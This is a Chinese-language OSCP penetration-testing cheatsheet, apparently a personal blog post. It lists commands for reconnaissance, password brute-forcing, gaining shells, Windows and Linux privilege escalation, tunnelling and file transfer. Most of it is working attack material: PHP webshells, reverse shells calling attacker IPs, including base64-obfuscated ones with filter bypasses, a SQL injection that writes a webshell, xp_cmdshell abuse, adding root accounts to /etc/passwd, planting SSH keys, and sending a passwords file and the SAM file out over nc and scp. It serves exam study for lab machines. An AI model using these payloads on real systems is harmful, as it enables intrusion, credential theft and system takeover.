OSCP NOTE (Cheatsheet)


  • 初期卡住看WP,看一步继续自己做
  • 通关以后回看几个WP,看有没有新路子
  • 有些exp试试改一下带不带URL最后/
  • 有些端口连接要telnet和nc都试试
  • 考试搜WP:关键词hack the box / tryhackme / ProvingGrounds
  • 二进制程序先strings一下
  • 看目录ls -al -R,windows里dir/a或tree /f,别漏隐藏文件
  • 不明端口连上去输help试试
  • 有wordpress的站打进去记得看数据库密码/var/www/html/wp-config.php

几个Payload页面:
Hack The Planet
Readme - PENETRATION NOTE
swisskyrepo/PayloadsAllTheThings

几个必备网站:
HackTricks - HackTricks
Exploit Database
GTFOBins
Online - Reverse Shell Generator

侦察

nmap

nmap --script vuln 192.168.146.60
nmap -sT -p- --min-rate 10000 10.129.138.220 

udp扫描
nmap -vvv -sU -o nmapudp 10.129.138.220 --max-retries 0
或者
nmap -sU --top-ports 10 -sV 10.129.228.106
具体udp
nmap -p 161,500 -sV -sU -sC 10.129.138.220

21 FTP

# 遍历下载
wget -m --no-passive ftp://anonymous:anonymous@192.168.186.145
wget -r -c -nH -np ftp://10.1.1.68/   --ftp-user=steph --ftp-password=billabong
# 直接查看
ftp> more xxxx

80 扫目录

gobuster dir -u http://192.168.146.71:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
gobuster dir -u http://192.168.146.54 -w /home/fazx/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

dirsearch -u http://192.168.234.143/ -r -R 2 -x 404 -w /usr/share/wordlists/dirb/big.txt

# new dict
/cgi-bin/admin.cgi
/api/heartbeat.php

80 FUZZ, API

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12 http://192.168.146.54/index.php?FUZZ=../location.txt

{GOBUSTER}/v1
{GOBUSTER}/v2
gobuster dir -u http://192.168.250.143 -w /usr/share/wordlists/dirb/big.txt -p pattern

80 wpscan

wpscan --url http://literally.vulnerable:65535/phpcms/ -t 20 --enumerate vt,vp,u (--passwords passwords)

80 hosts / cms

cmseek -u http://192.168.186.145/
whatweb http://192.168.50.244

echo "192.168.146.65    literally.vulnerable" >> /etc/hosts
有些资源加载不了,看F12改了hosts才行

135 RPC

rpcclient -U "" -N 192.168.186.145

for i in $(seq 500 1100); do
    rpcclient -N -U "" 192.168.186.145 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done

161 SNMP udp

snmp-check "192.168.233.145" -c public
snmpwalk -c public -v1 192.168.210.149
snmpbulkwalk -c public -v2c 10.10.11.136 .
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

445 smb

crackmapexec smb 192.168.186.145
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
crackmapexec smb ip -u 'anonymous' -p 'anonymous' --users

smbclient -N -L //192.168.186.145
smbclient -L //172.16.210.83/ -U medtech.com/wario --pw-nt-hash
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator

impacket-psexec -hashes 00000000000000000000000000000000:e728ecbadfb02f51ce8eed753f3ff3fd celia.almeda@10.10.140.142

1433 MSSQL

crackmapexec mssql ip -u sa -p pass --local-auth -x 'whoami'
impacket-mssqlclient sql_svc:Dolphin1@10.10.100.148 -windows-auth
sqsh -U sa -P poiuytrewq  -S 10.11.1.31:1433 

a'+or+'a'='a'+;exec+master..xp_cmdshell+'ping+192.168.119.169'--

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'

3389 RDP

连接

xfreerdp /u:test /p:123 /v:10.10.100.148 /cert:ignore -wallpaper /drive:kali,/root/Desktop/exp/temp

# 配置文件
/u:mac
/p:IAmTheGOATSysAdmin!
/v:192.168.126.221
/cert:ignore
/drive:kali,/root/Desktop/exp

开启RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net stop termservice && net start termservice

LFI

思路:可以读/etc/passwd看用户名,再去用户目录下读私钥/home/user/.ssh/id_rsa
argument name is like view, file, page, skin, theme, lang, template, file inclusion is highly possible

?page=php://filter/convert.base64-encode/resource=view.php

windows LFI files
https://notchxor.github.io/oscp-notes/4-win-privesc/15-LFI-FILES/

爆破

字典

/usr/share/dirb/wordlists/common.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wfuzz/wordlist/general/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Hydra

hydra -l pinky -P /usr/share/dirb/wordlists/common.txt 192.168.146.54 -s 7654 http-post-form '/login.php:user=^USER^&pass=^PASS^:F=Invalid'

hydra -l admin -P /home/fazx/SecLists/Passwords/2020-200_most_used_passwords.txt "ignition.htb" http-post-form "/admin:form_key=WaEWxk61HqTZyMVP&login%5Busername%5D=admin&login%5Bpassword%5D=^PASS^:please sign in" -V

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.146.55 ssh

hydra -L /usr/share/wordlists/chaoji/dic_username_ftp.txt -P /usr/share/wordlists/chaoji/dic_password_ftp.txt 192.168.146.80 ftp 

hydra 192.168.146.60 -P /usr/share/wordlists/rockyou.txt http-post-form '/kzMb5nVYJw/index.php:key=^PASS^:invalid' -la(相当于用户名随便输入个a)

hydra -l postgres -P /usr/share/wordlists/rockyou.txt 192.168.234.143 postgres

wpscan

wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.247.148:8080 --no-banner -U jerome -P /usr/share/wordlists/rockyou.txt

wpscan --url http://192.168.50.244 --enumerate ap --plugins-detection aggressive

aggressive模式可以扫出更多的插件, p是popular,vp vulnerable ,ap all

samba

枚举用户:
enum4linux -U 192.168.3.142
爆破密码
./acccheck.pl -t 192.168.3.142 -u smb -v
登陆查看
smbclient //192.168.3.142/smb -U smb

zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sitebackup3.zip -v

zip2john sitebackup3.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt 

getshell

webshell

<?php system($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']);

UNION注入写shell

1' UNION SELECT 1,2,3,("<?php echo passthru($_GET['cmd']);") INTO OUTFILE '/var/www/html/tmp/123.php'#

反弹shell

https://www.revshells.com/
cme 执行powershell命令比较稳

# busybox shell捡漏nc -e / nc-c
busybox nc 192.168.146.55 8888 -e sh
# php一句话反弹
<?php $sock = fsockopen("192.168.146.55",8888); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
# windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=3306 -f exe > evil.exe 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.164 LPORT=21 -f exe > 21.exe
php -r ‘$sock=fsockopen(“192.168.146.58”,8888);exec(“/bin/sh -i <&3 >&3 2>&3”);’

echo "echo cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMTQ2LjU4Iiw4ODg4KTtwb3BlbigiL2Jpbi9iYXNoIDwmMyA+JjMgMj4mMyIsICJyIik7Jw== | base64 -d" >> ../write.sh

echo "php -r $sock=fsockopen("192.168.146.58",8888);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh

?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php

nc 192.168.146.55 9999 | /bin/bash | nc 192.168.146.55 8888

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe > 443.exe

socat完全交互式shell

kali:   socat file:`tty`,raw,echo=0 tcp-listen:8888
靶机:./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.146.55:8888

python半交互式

//半交互shell,在靶机执行
python -c 'import pty; pty.spawn("/bin/bash")' 
python3 -c 'import pty; pty.spawn("/bin/bash")' 

stty升级完全交互式

//完全交互式
//Kali下装了GNOME的zsh终端会有问题,回车变成^M无法使用
//所以先输入bash回归普通终端
# In Kali
$ bash

# In reverse shell 
$ python -c 'import pty; pty.spawn("/bin/bash")' 
Ctrl-Z

# In Kali 
$ stty raw -echo 
$ fg 

# In reverse shell 
$ reset
如果询问Terminal type?可以输入xterm-256color,虽然但是vi可能会看不到字
所以一般就老实xterm或者dumb    (echo $TERM)

Windows提权

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
https://benheater.com/thm-windows-privesc/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://zhuanlan.zhihu.com/p/428516577

先看权限

whoami /all

SeImpersonatePrivilege

PrintSpoofer64.exe -i -c cmd.exe
.\PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c "powershell.exe -e JABjAGwAa..."
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"

看服务

certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"

schtasks /query /fo LIST /v
icacls "%ProgramFiles%\RUXIM\PLUGscheduler.exe"

accesschk.exe /accepeula -uwcqv "user"

Service unquoted path

powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"  这个直接加用户了,方便  john/Password123!
Restart-Service GammaService

看漏洞

Winpeas

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"

AlwaysInstallElevated MSI Abuse

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

都为1时,普通用户执行MSI具有SYSTEM权限

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=443 -f msi > ~/Desktop/exp/shell443.msi
直接执行msi就行,下面是静默安装命令
msiexec /quiet /qn /i C:\Temp\setup.msi

手动找其他信息

SauronEye.exe -d C:\Users\ --filetypes .txt .xml .conf .log --contents --keywords password
type C:\Users\wario\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#查看ps的历史命令文件
dir /s /b "ConsoleHost_history.txt"

# ssh
reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys
reg query "HKCU\Software\OpenSSH\Agent\Key"

Linux提权

LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget http://192.168.146.55/linpeas.sh

Pspy

# 持续监测进程,弥补linpeas
wget https://hub.nuaa.cf/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

计划任务

grep "CRON" /var/log/cron.log
cat /etc/crontab

/etc/passwd

openssl passwd evil
echo "root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root4::0:0::/root:/bin/bash" >> /etc/passwd
不能通过ssh登录,只能从已有shell su过去


SUID

#Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
(-perm 4000对应-rws)

# (可能需要有当前用户密码,这个在/etc/sudoers里定义
sudo -ll #Check commands you can execute with sudo
//list user's privileges or check a specific command; use twice for longer format

https://tttang.com/archive/1793/

特殊文件

可能出现看不到的计划任务,需要猜测改文件

# 查找对应用户的文件
find / -user demon 2>/dev/null | grep -Ev '/proc|/sys|/user'
find / -user www-data -ls 2>/dev/null | (grep -v proc)
# 查可写文件
find / -writable 2>/dev/null | grep -v proc
# 记得find -name是精确匹配
find / -name *penguin*

searchsploit

grep PRETTY /etc/os-release
searchsploit linux kernel ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc 45010.c –o 45010

覆盖环境变量提权

cd /tmp
echo “/bin/sh” > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami


Pwnkit

https://github.com/arthepsy/CVE-2021-4034

user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc

It's all about the version.

According to https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py versions below these are vulnerable:
Ubuntu 20.04: 0.105-26ubuntu1.2
Ubuntu 21.10: 0.105-31ubuntu0.1
Ubuntu 18.04: 0.105-20ubuntu0.18.04.6
Debian stretch: 0.105-18+deb9u2
Debian buster: 0.105-25+deb10u1
Debian bullseye: 0.105-31+deb11u1

lxd提权

首先要在lxd group中,并且安装了lxc
https://reboare.github.io/lxd/lxd-escape.html
https://windsorwebdeveloper.com/web-developer-1-vulnhub-walkthrough/

ubuntu@ubuntu:~$ lxd init(都按默认一路回车)
ubuntu@ubuntu:~$ lxc init ubuntu:16.04 test -c security.privileged=true 
Creating test 
ubuntu@ubuntu:~$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true 
Device whatever added to test 
ubuntu@ubuntu:~$ lxc start test 
ubuntu@ubuntu:~$ lxc exec test bash 

NFS提权

首先要/etc/exports文件中写的文件夹权限是no_root_squash

(in Kali)
# showmount -e 192.168.146.60           
Export list for 192.168.146.60:
/home/user5 *
# mkdir nfstmp                                                                        
# mount -t nfs 192.168.146.60:/home/user5 nfstmp                        130 ⨯
# cd nfstmp                                                                                           
# cp /bin/sh ./nfsh
# chmod +s
(in target)
# ./sh -p

挂载共享后放个SUID文件再提权,实测这种方法不管是拷bash、编译c还是写python,都会产生文件euid和uid不相等的情况,这种情况下会实际以uid权限执行导致提权失败,因此sh要加-p参数不重置euid。

域内横向

(placeholder)

搭建隧道

kali上
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

kali:
./proxy -selfcert

靶机:
agentw64.exe -connect 192.168.119.166:11601 -ignore-cert 

kali:
>session
>ifconfig

另起一个命令行:
ip route add 10.10.56.0/24 dev ligolo    #10.10.56.0是要去往的那个网段

>start

>端口转发功能:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp 
将靶机的1234端口转发到kali的4321端口

listener_add --addr 127.0.0.1:80 --to 0.0.0.0:80 --tcp 
将kali的80端口转发到靶机的80端口

注意0.0.0.0 代表的就算agent地址
127.0.0.1 代表的是kali的地址,不需要换ip,直接用

文件相关

写文件

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D

cat > 2.txt <<EOF
this is test
this is test
this is test
EOF

写公钥

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdubHNkqPbAwD0ikkAKCWcEmxDNokB4gYle0ioj/NC/PA6wQjHRFOA32H/xGS1aGuTv3+xe9d7F4m6QuhZytNJ6QeVchqnf6zqg+0XlRyNxA3SUVxl2j+8fMgHeA92QqfWoIcknH/CaEWo5ZQTrSL4+A0hX2c7xMy2RyU4LEYxY3pEy9LayHmaqjHd3CKaeiDDDyEhSuGNPn1xPAOLB4h4idk88Ih50tu6rbl0hk/rEUCFYTTsWNtVy1u+uGAqimHv0xsYKQux1JLkymKYERXwTxSmNjK0Bx/d5IrI4oh4iUfnxqsvwcG6Sb6sKFwlhYypNgRr6zU3eZMltsSlc10j root@kali" > .ssh/authorized_keys

文件传输

nc.exe 192.168.45.201 80 < "C:\Users\offsec\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt"
nc -lp 80 > pass.txt

scp C:\windows.old\windows\system32\SAM root@10.10.100.147:/root/Desktop/

kali> impacket-smbserver myshare ./ -smb2
net use M: \\10.10.100.147:4455\myshare
cp a.exe M:

文件下载

certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"

查找文件内容

$ grep -R ".trash_old" /var/ 2>/dev/null
/var/spool/cron/crontabs/root:* * * * * /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

find / -type f | xargs grep tmp.py

其他

Python virtualenv

virtualenv .
source ./bin/active
./bin/deactivate

searchsploit

searchsploit -u # 更新库
searchsploit -m 50505 # 拷贝到本地
searchsploit -x 50505 # 查看exp内容

绕过

/bin/ech? bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMyA2NjY2ICAK|/u?r/b?n/b?se64 -d|/bin/?h

echo+YnVzeWJveCBuYyAxOTIuMTY4LjE0Ni41NSA4ODg4IC1lIC9iaW4vYmFzaA==+|+base64+-d|sh

-t 'bash --noprofile' 绕过rbash

base64

//加密命令
echo "ls -l" | base64

//解密命令并执行
echo bHMgLWwK | base64 -d | sh
文章目录
  1. 1. 侦察
    1. 1.1. nmap
    2. 1.2. 21 FTP
    3. 1.3. 80 扫目录
    4. 1.4. 80 FUZZ, API
    5. 1.5. 80 wpscan
    6. 1.6. 80 hosts / cms
    7. 1.7. 135 RPC
    8. 1.8. 161 SNMP udp
    9. 1.9. 445 smb
    10. 1.10. 1433 MSSQL
    11. 1.11. 3389 RDP
    12. 1.12. LFI
  2. 2. 爆破
    1. 2.1. 字典
    2. 2.2. Hydra
    3. 2.3. wpscan
    4. 2.4. samba
    5. 2.5. zip
  3. 3. getshell
    1. 3.1. webshell
    2. 3.2. UNION注入写shell
    3. 3.3. 反弹shell
    4. 3.4. socat完全交互式shell
    5. 3.5. python半交互式
    6. 3.6. stty升级完全交互式
  4. 4. Windows提权
    1. 4.1. 先看权限
    2. 4.2. SeImpersonatePrivilege
    3. 4.3. 看服务
    4. 4.4. Service unquoted path
    5. 4.5. 看漏洞
    6. 4.6. Winpeas
    7. 4.7. AlwaysInstallElevated MSI Abuse
    8. 4.8. 手动找其他信息
  5. 5. Linux提权
    1. 5.1. LinPEAS
    2. 5.2. Pspy
    3. 5.3. 计划任务
    4. 5.4. /etc/passwd
    5. 5.5. SUID
    6. 5.6. 特殊文件
    7. 5.7. searchsploit
    8. 5.8. 覆盖环境变量提权
    9. 5.9. Pwnkit
    10. 5.10. lxd提权
    11. 5.11. NFS提权
  6. 6. 域内横向
  7. 7. 搭建隧道
  8. 8. 文件相关
    1. 8.1. 写文件
    2. 8.2. 写公钥
    3. 8.3. 文件传输
    4. 8.4. 文件下载
    5. 8.5. 查找文件内容
  9. 9. 其他
    1. 9.1. Python virtualenv
    2. 9.2. searchsploit
    3. 9.3. 绕过
    4. 9.4. base64
|